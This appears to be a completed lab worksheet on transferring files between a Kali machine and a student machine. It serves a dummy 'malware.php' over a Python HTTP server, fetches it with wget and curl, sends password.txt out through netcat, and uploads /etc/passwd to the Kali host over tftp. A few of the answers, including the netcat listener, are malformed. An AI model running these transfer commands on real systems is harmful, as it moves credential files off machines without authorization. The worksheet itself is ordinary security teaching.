## **Downloading files**

- 1. On your Kali machine, create a file named malware.php. echo "This is a malware file" > malware.php
  - 2. Then, in the same directory, create a temporary server with python on port 5000.

python3 -m http.server 5000

3. On your student machine, download the malware.txt file with the wget command.

Your command: wget 10.0.2.15/malware.php

4. On your Student machine, download the malware.txt file with the cURL command.

Your command: curl -O 10.0.2.15/malware.php

5. On the student machine, create a file named password.txt and transfer it to your student machine with netcat

Your commands: nc -l -p 9090 > 10.0.2.15 80

Cat password.txt | nc 10.13.1.109 9090

6. On the student machine, transfer /etc/passwd file to your kali machine with tftp

your commands: tftp 10.0.2.15

tftp> put /etc/passwd